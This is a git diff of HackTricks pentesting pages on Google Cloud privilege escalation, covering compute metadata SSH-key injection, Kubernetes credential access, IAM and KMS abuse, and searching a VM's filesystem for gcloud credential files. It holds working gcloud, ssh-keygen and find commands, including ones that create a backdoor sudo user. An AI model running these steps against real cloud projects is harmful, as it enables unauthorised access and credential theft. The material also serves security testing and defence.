Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\ Limitations: -* Note that GCP Service Accounts running in VM instances by default have a **very limited scope** -* You will need to be **able to contact the SSH** server to login +- Note that GCP Service Accounts running in VM instances by default have a **very limited scope** +- You will need to be **able to contact the SSH** server to login For more information about how to exploit this permission check: -{% content-ref url="gcp-add-custom-ssh-metadata.md" %} -[gcp-add-custom-ssh-metadata.md](gcp-add-custom-ssh-metadata.md) -{% endcontent-ref %} +{{#ref}} +gcp-add-custom-ssh-metadata.md +{{#endref}} You could aslo perform this attack by adding new startup-script and rebooting the instance: 
@@ -79,17 +65,15 @@ gcloud compute instances set-iam-policy $INSTANCE policy.json --zone=$ZONE If **OSLogin is enabled in the instance**, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You **won't have root privs** inside the instance. -{% hint style="success" %} -In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM. -{% endhint %} +> [!TIP] +> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM. ### **`compute.instances.osAdminLogin`** If **OSLogin is enabled in the instanc**e, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have **root privs** inside the instance. -{% hint style="success" %} -In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM. -{% endhint %} +> [!TIP] +> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM. ### `compute.instances.create`,`iam.serviceAccounts.actAs, compute.disks.create`, `compute.instances.create`, `compute.instances.setMetadata`, `compute.instances.setServiceAccount`, `compute.subnetworks.use`, `compute.subnetworks.useExternalIp` 
@@ -106,7 +90,6 @@ Note that at the moment you **don't need `actAs` permission** over the SA attach If you want to manually exploit this you will need to create either a [**patch job**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_job.json) **or** [**deployment**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_deployment.json)**.**\ For a patch job run: -{% code overflow="wrap" %} ```python cat > /tmp/patch-job.sh <[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md new file mode 100644 index 000000000..f0d3982df --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md 
@@ -0,0 +1,100 @@ +# GCP - Add Custom SSH Metadata + +## GCP - Add Custom SSH Metadata + +{{#include ../../../../banners/hacktricks-training.md}} + +### Modifying the metadata + +Metadata modification on an instance could lead to **significant security risks if an attacker gains the necessary permissions**. + +#### **Incorporation of SSH Keys into Custom Metadata** + +On GCP, **Linux systems** often execute scripts from the [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts). A critical component of this is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which is designed to **regularly check** the instance metadata endpoint for **updates to the authorized SSH public keys**. + +Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and **integrated into the local system**. The key will be added into `~/.ssh/authorized_keys` file of an **existing user or potentially creating a new user with `sudo` privileges**, depending on the key's format. And the attacker will be able to compromise the host. + +#### **Add SSH key to existing privileged user** + +1. **Examine Existing SSH Keys on the Instance:** + + - Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under `metadata`, specifically the `ssh-keys` key. + + ```bash + gcloud compute instances describe [INSTANCE] --zone [ZONE] + ``` + + - Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon. + +2. **Prepare a Text File for SSH Key Metadata:** + - Save the details of usernames and their corresponding SSH keys into a text file named `meta.txt`. 
This is essential for preserving the existing keys while adding new ones. +3. **Generate a New SSH Key for the Target User (`alice` in this example):** + + - Use the `ssh-keygen` command to generate a new SSH key, ensuring that the comment field (`-C`) matches the target username. + + ```bash + ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub + ``` + + - Add the new public key to `meta.txt`, mimicking the format found in the instance's metadata. + +4. **Update the Instance's SSH Key Metadata:** + + - Apply the updated SSH key metadata to the instance using the `gcloud compute instances add-metadata` command. + + ```bash + gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt + ``` + +5. **Access the Instance Using the New SSH Key:** + + - Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (`alice` in this example). + + ```bash + ssh -i ./key alice@localhost + sudo id + ``` + +#### **Create a new privileged user and add a SSH key** + +If no interesting user is found, it's possible to create a new one which will be given `sudo` privileges: + +```bash +# define the new account username +NEWUSER="definitelynotahacker" + +# create a key +ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P "" + +# create the input meta file +NEWKEY="$(cat ./key.pub)" +echo "$NEWUSER:$NEWKEY" > ./meta.txt + +# update the instance metadata +gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt + +# ssh to the new account +ssh -i ./key "$NEWUSER"@localhost +``` + +#### SSH keys at project level + +It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by **applying SSH keys at the project level**. This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys. Here's a summarized guide: + +1. 
**Apply SSH Keys at the Project Level:** + + - Use the `gcloud compute project-info add-metadata` command to add SSH keys from `meta.txt` to the project's metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the "Block project-wide SSH keys" option enabled. + + ```bash + gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt + ``` + +2. **SSH into Instances Using Project-Wide Keys:** + - With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access. + - A direct method to SSH into an instance is using the `gcloud compute ssh [INSTANCE]` command. This command uses your current username and the SSH keys set at the project level to attempt access. + +## References + +- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md new file mode 100644 index 000000000..0d19418a2 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md 
@@ -0,0 +1,91 @@ +# GCP - Container Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## container + +### `container.clusters.get` + +This permission allows to **gather credentials for the Kubernetes cluster** using something like: + +```bash +gcloud container clusters get-credentials --zone +``` + +Without extra permissions, the credentials are pretty basic as you can **just list some resource**, but hey are useful to find miss-configurations in the environment. + +> [!NOTE] +> Note that **kubernetes clusters might be configured to be private**, that will disallow that access to the Kube-API server from the Internet. + +If you don't have this permission you can still access the cluster, but you need to **create your own kubectl config file** with the clusters info. A new generated one looks like this: + +```yaml +apiVersion: v1 +clusters: + - cluster: + certificate-authority-data: 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 + server: https://34.123.141.28 + name: gke_security-devbox_us-central1_autopilot-cluster-1 +contexts: + - context: + cluster: gke_security-devbox_us-central1_autopilot-cluster-1 + user: gke_security-devbox_us-central1_autopilot-cluster-1 + name: gke_security-devbox_us-central1_autopilot-cluster-1 +current-context: gke_security-devbox_us-central1_autopilot-cluster-1 +kind: Config +preferences: {} +users: + - name: gke_security-devbox_us-central1_autopilot-cluster-1 + user: + auth-provider: + config: + access-token: + cmd-args: config config-helper --format=json + cmd-path: gcloud + expiry: "2022-12-06T01:13:11Z" + expiry-key: "{.credential.token_expiry}" + token-key: "{.credential.access_token}" + name: gcp +``` + +### `container.roles.escalate` | `container.clusterRoles.escalate` + +**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** that the ones the principal has. 
However, a **GCP** principal with that permissions will be **able to create/update Roles/ClusterRoles with more permissions** that ones he held, effectively bypassing the Kubernetes protection against this behaviour. + +**`container.roles.create`** and/or **`container.roles.update`** OR **`container.clusterRoles.create`** and/or **`container.clusterRoles.update`** respectively are **also** **necessary** to perform those privilege escalation actions. + +### `container.roles.bind` | `container.clusterRoles.bind` + +**Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update RolesBindings/ClusterRolesBindings with more permissions** that ones he has, effectively bypassing the Kubernetes protection against this behaviour. + +**`container.roleBindings.create`** and/or **`container.roleBindings.update`** OR **`container.clusterRoleBindings.create`** and/or **`container.clusterRoleBindings.update`** respectively are also **necessary** to perform those privilege escalation actions. + +### `container.cronJobs.create` | `container.cronJobs.update` | `container.daemonSets.create` | `container.daemonSets.update` | `container.deployments.create` | `container.deployments.update` | `container.jobs.create` | `container.jobs.update` | `container.pods.create` | `container.pods.update` | `container.replicaSets.create` | `container.replicaSets.update` | `container.replicationControllers.create` | `container.replicationControllers.update` | `container.scheduledJobs.create` | `container.scheduledJobs.update` | `container.statefulSets.create` | `container.statefulSets.update` + +All these permissions are going to allow you to **create or update a resource** where you can **define** a **pod**. 
Defining a pod you can **specify the SA** that is going to be **attached** and the **image** that is going to be **run**, therefore you can run an image that is going to **exfiltrate the token of the SA to your server** allowing you to escalate to any service account.\ +For more information check: + +As we are in a GCP environment, you will also be able to **get the nodepool GCP SA** from the **metadata** service and **escalate privileges in GC**P (by default the compute SA is used). + +### `container.secrets.get` | `container.secrets.list` + +As [**explained in this page**, ](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#listing-secrets)with these permissions you can **read** the **tokens** of all the **SAs of kubernetes**, so you can escalate to them. + +### `container.pods.exec` + +With this permission you will be able to **exec into pods**, which gives you **access** to all the **Kubernetes SAs running in pods** to escalate privileges within K8s, but also you will be able to **steal** the **GCP Service Account** of the **NodePool**, **escalating privileges in GCP**. + +### `container.pods.portForward` + +As **explained in this page**, with these permissions you can **access local services** running in **pods** that might allow you to **escalate privileges in Kubernetes** (and in **GCP** if somehow you manage to talk to the metadata service)**.** + +### `container.serviceAccounts.createToken` + +Because of the **name** of the **permission**, it **looks like that it will allow you to generate tokens of the K8s Service Accounts**, so you will be able to **privesc to any SA** inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find it. 
+ +### `container.mutatingWebhookConfigurations.create` | `container.mutatingWebhookConfigurations.update` + +These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**.\ +For more information [**follow this link**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#malicious-admission-controller). + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md new file mode 100644 index 000000000..e90828d7e --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md 
@@ -0,0 +1,29 @@ +# GCP - Deploymentmaneger Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## deploymentmanager + +### `deploymentmanager.deployments.create` + +This single permission lets you **launch new deployments** of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it. + +You could actually **launch any resource** listed in `gcloud deployment-manager types list` + +In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) following[ **script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance, however that script won't work. Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)**.** + +### `deploymentmanager.deployments.update` + +This is like the previous abuse but instead of creating a new deployment, you modifies one already existing (so be careful) + +Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)**.** + +### `deploymentmanager.deployments.setIamPolicy` + +This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previous _deploymentmanager.deployments.create_ section. + +## References + +- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) + +{{#include ../../../banners/hacktricks-training.md}} 
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md similarity index 77% rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md index ed0718452..bd601f58d 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md @@ -1,27 +1,14 @@ # GCP - IAM Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## IAM Find more information about IAM in: -{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %} -[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-iam-and-org-policies-enum.md +{{#endref}} ### `iam.roles.update` (`iam.roles.get`) @@ -116,9 +103,9 @@ The **iam.serviceAccounts.actAs permission** is like the **iam:PassRole permissi Impersonating a service account can be very useful to **obtain new and better privileges**. There are three ways in which you can [impersonate another service account](https://cloud.google.com/iam/docs/understanding-service-accounts#impersonating_a_service_account): -* Authentication **using RSA private keys** (covered above) -* Authorization **using Cloud IAM policies** (covered here) -* **Deploying jobs on GCP services** (more applicable to the compromise of a user account) +- Authentication **using RSA private keys** (covered above) +- Authorization **using Cloud IAM policies** (covered here) +- **Deploying jobs on GCP services** (more applicable to the compromise of a user account) ### `iam.serviceAccounts.getOpenIdToken` 
@@ -143,28 +130,15 @@ curl -v -H "Authorization: Bearer id_token" https://some-cloud-run-uc.a.run.app Some services that support authentication via this kind of tokens are: -* [Google Cloud Run](https://cloud.google.com/run/) -* [Google Cloud Functions](https://cloud.google.com/functions/docs/) -* [Google Identity Aware Proxy](https://cloud.google.com/iap/docs/authentication-howto) -* [Google Cloud Endpoints](https://cloud.google.com/endpoints/docs/openapi/authenticating-users-google-id) (if using Google OIDC) +- [Google Cloud Run](https://cloud.google.com/run/) +- [Google Cloud Functions](https://cloud.google.com/functions/docs/) +- [Google Identity Aware Proxy](https://cloud.google.com/iap/docs/authentication-howto) +- [Google Cloud Endpoints](https://cloud.google.com/endpoints/docs/openapi/authenticating-users-google-id) (if using Google OIDC) You can find an example on how to create and OpenID token behalf a service account [**here**](https://github.com/carlospolop-forks/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getOpenIdToken.py). ## References -* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) +- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md similarity index 56% rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md index 6b209238a..3d8668070 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md @@ -1,27 +1,14 @@ # GCP - KMS Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## KMS Info about KMS: -{% content-ref url="../gcp-services/gcp-kms-enum.md" %} -[gcp-kms-enum.md](../gcp-services/gcp-kms-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-kms-enum.md +{{#endref}} Note that in KMS the **permission** are not only **inherited** from Orgs, Folders and Projects but also from **Keyrings**. @@ -71,16 +58,14 @@ title: "KMS Decryption via Delegation" description: "Allows decryption via delegation" stage: "GA" includedPermissions: -- "cloudkms.cryptoKeyVersions.useToDecryptViaDelegation" + - "cloudkms.cryptoKeyVersions.useToDecryptViaDelegation" ``` 2. **Create the Custom Role Using the gcloud CLI**: Use the following command to create the custom role in your Google Cloud project: -{% code overflow="wrap" %} ```bash gcloud iam roles create kms_decryptor_via_delegation --project [YOUR_PROJECT_ID] --file custom_role.yaml ``` -{% endcode %} Replace `[YOUR_PROJECT_ID]` with your Google Cloud project ID. @@ -100,17 +85,4 @@ gcloud projects add-iam-policy-binding [YOUR_PROJECT_ID] \ Replace `[YOUR_PROJECT_ID]` and `[SERVICE_ACCOUNT_EMAIL]` with your project ID and the email of the service account, respectively. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md similarity index 54% rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md index 8abd52c60..798518438 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md @@ -1,19 +1,6 @@ # GCP - local privilege escalation ssh pivoting -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} in this scenario we are going to suppose that you **have compromised a non privilege account** inside a VM in a Compute Engine project. @@ -39,7 +26,9 @@ Moreover, it's possible to add **userdata**, which is a script that will be **ex For more info check: -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf +{{#endref}} ## **Abusing IAM permissions** @@ -47,11 +36,11 @@ Most of the following proposed permissions are **given to the default Compute SA Check the following permissions: -* [**compute.instances.osLogin**](gcp-compute-privesc/#compute.instances.oslogin) -* [**compute.instances.osAdminLogin**](gcp-compute-privesc/#compute.instances.osadminlogin) -* [**compute.projects.setCommonInstanceMetadata**](gcp-compute-privesc/#compute.projects.setcommoninstancemetadata) -* [**compute.instances.setMetadata**](gcp-compute-privesc/#compute.instances.setmetadata) -* [**compute.instances.setIamPolicy**](gcp-compute-privesc/#compute.instances.setiampolicy) +- [**compute.instances.osLogin**](gcp-compute-privesc/#compute.instances.oslogin) +- [**compute.instances.osAdminLogin**](gcp-compute-privesc/#compute.instances.osadminlogin) +- [**compute.projects.setCommonInstanceMetadata**](gcp-compute-privesc/#compute.projects.setcommoninstancemetadata) +- [**compute.instances.setMetadata**](gcp-compute-privesc/#compute.instances.setmetadata) +- [**compute.instances.setIamPolicy**](gcp-compute-privesc/#compute.instances.setiampolicy) ## Search for Keys in the filesystem 
@@ -63,10 +52,10 @@ sudo find / -name "gcloud" These are the most interesting files: -* `~/.config/gcloud/credentials.db` -* `~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json` -* `~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto` -* `~/.credentials.json` +- `~/.config/gcloud/credentials.db` +- `~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json` +- `~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto` +- `~/.credentials.json` ### More API Keys regexes @@ -104,19 +93,6 @@ grep -Pzr '(?s)
' \ ## References -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) +- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md new file mode 100644 index 000000000..6c155ac6a --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md 
@@ -0,0 +1,25 @@
+# GCP - Generic Permissions Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Generic Interesting Permissions
+
+### \*.setIamPolicy
+
+If you owns a user that has the **`setIamPolicy`** permission in a resource you can **escalate privileges in that resource** because you will be able to change the IAM policy of that resource and give you more privileges over it.\
+This permission can also allow to **escalate to other principals** if the resource allow to execute code and the iam.ServiceAccounts.actAs is not necessary.
+
+- _cloudfunctions.functions.setIamPolicy_
+ - Modify the policy of a Cloud Function to allow yourself to invoke it.
+
+There are tens of resources types with this kind of permission, you can find all of them in [https://cloud.google.com/iam/docs/permissions-reference](https://cloud.google.com/iam/docs/permissions-reference) searching for setIamPolicy.
+
+### \*.create, \*.update
+
+These permissions can be very useful to try to escalate privileges in resources by **creating a new one or updating a new one**. These can of permissions are specially useful if you also has the permission **iam.serviceAccounts.actAs** over a Service Account and the resource you have .create/.update over can attach a service account.
+
+### \*ServiceAccount\*
+
+This permission will usually let you **access or modify a Service Account in some resource** (e.g.: compute.instances.setServiceAccount). This **could lead to a privilege escalation** vector, but it will depend on each case.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md similarity index 60% rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md index 5d99557d8..8126e305e 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md @@ -1,19 +1,6 @@ # GCP - Network Docker Escape -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
